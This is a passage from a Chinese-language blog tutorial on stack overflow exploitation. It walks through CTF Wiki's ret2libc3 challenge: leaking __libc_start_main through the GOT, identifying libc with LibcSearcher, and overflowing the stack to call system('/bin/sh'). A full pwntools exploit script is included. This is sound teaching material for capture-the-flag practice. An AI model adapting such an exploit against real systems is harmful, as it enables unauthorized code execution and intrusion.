<p>那么如何得到 libc 中的某个函数的地址呢？我们一般常用的方法是采用 got 表泄露，即输出某个函数对应的 got 表项的内容。<strong>当然，由于 libc 的延迟绑定机制，我们需要泄漏已经执行过的函数的地址。</strong></p>
<p>我们自然可以根据上面的步骤先得到 libc，之后在程序中查询偏移，然后再次获取 system 地址，但这样手工操作次数太多，有点麻烦，这里给出一个 libc 的利用工具，具体细节请参考 readme</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/lieanu/LibcSearcher">https://github.com/lieanu/LibcSearcher</a></li>
</ul>
<p>此外，在得到 libc 之后，其实 libc 中也是有 /bin/sh 字符串的，所以我们可以一起获得 /bin/sh 字符串的地址。</p>
<p>这里我们泄露 __libc_start_main 的地址，这是因为它是程序最初被执行的地方。基本利用思路如下</p>
<ul>
<li>泄露 __libc_start_main 地址</li>
<li>获取 libc 版本</li>
<li>获取 system 地址与 /bin/sh 的地址</li>
<li>再次执行源程序</li>
<li>触发栈溢出执行 system(‘/bin/sh’)</li>
</ul>
<p>exp 如下</p>
<figure class="highlight gradle"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs gradle">#!<span class="hljs-regexp">/usr/</span>bin/env python<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher<br>sh = process(<span class="hljs-string">'./ret2libc3'</span>)<br><br>ret2libc3 = ELF(<span class="hljs-string">'./ret2libc3'</span>)<br><br>puts_plt = ret2libc3.plt[<span class="hljs-string">'puts'</span>]<br>libc_start_main_got = ret2libc3.got[<span class="hljs-string">'__libc_start_main'</span>]<br>main = ret2libc3.symbols[<span class="hljs-string">'main'</span>]<br><br><span class="hljs-keyword">print</span> <span class="hljs-string">"leak libc_start_main_got addr and return to main again"</span><br>payload = flat([<span class="hljs-string">'A'</span> * <span class="hljs-number">112</span>, puts_plt, main, libc_start_main_got])<br>sh.sendlineafter(<span class="hljs-string">'Can you find it !?'</span>, payload)<br><br><span class="hljs-keyword">print</span> <span class="hljs-string">"get the related addr"</span><br>libc_start_main_addr = u32(sh.recv()[<span class="hljs-number">0</span>:<span class="hljs-number">4</span>])<br>libc = LibcSearcher(<span class="hljs-string">'__libc_start_main'</span>, libc_start_main_addr)<br>libcbase = libc_start_main_addr - libc.<span class="hljs-keyword">dump</span>(<span class="hljs-string">'__libc_start_main'</span>)<br>system_addr = libcbase + libc.<span class="hljs-keyword">dump</span>(<span class="hljs-string">'system'</span>)<br>binsh_addr = libcbase + libc.<span class="hljs-keyword">dump</span>(<span class="hljs-string">'str_bin_sh'</span>)<br><br><span class="hljs-keyword">print</span> <span class="hljs-string">"get shell"</span><br>payload = flat([<span class="hljs-string">'A'</span> * <span class="hljs-number">104</span>, system_addr, <span class="hljs-number">0</span>xdeadbeef, binsh_addr])<br>sh.sendline(payload)<br><br>sh.interactive()<br></code></pre></td></tr></tbody></table></figure>

<h3 id="题目-¶-2"><a href="#题目-¶-2" class="headerlink" title="题目 ¶"></a>题目 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_11">¶</a></h3><ul>
<li>train.cs.nctu.edu.tw: ret2libc</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pwn/">#pwn</a>
      
        <a href="/tags/stack-overflow/">#stack overflow</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>栈溢出漏洞利用</div>
      <div>https://alazymechnaic.github.io/2023/04/26/zhan-yi-chu-lou-dong-li-yong/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>alazymachine</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年4月26日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/04/27/dan-zi-jie-yi-chu-one-byte-overflow/" title="单字节溢出（one-byte-overflow）">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">单字节溢出（one-byte-overflow）</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/02/28/xu-ni-hua-an-quan/" title="虚拟化安全">
                        <span class="hidden-mobile">虚拟化安全</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
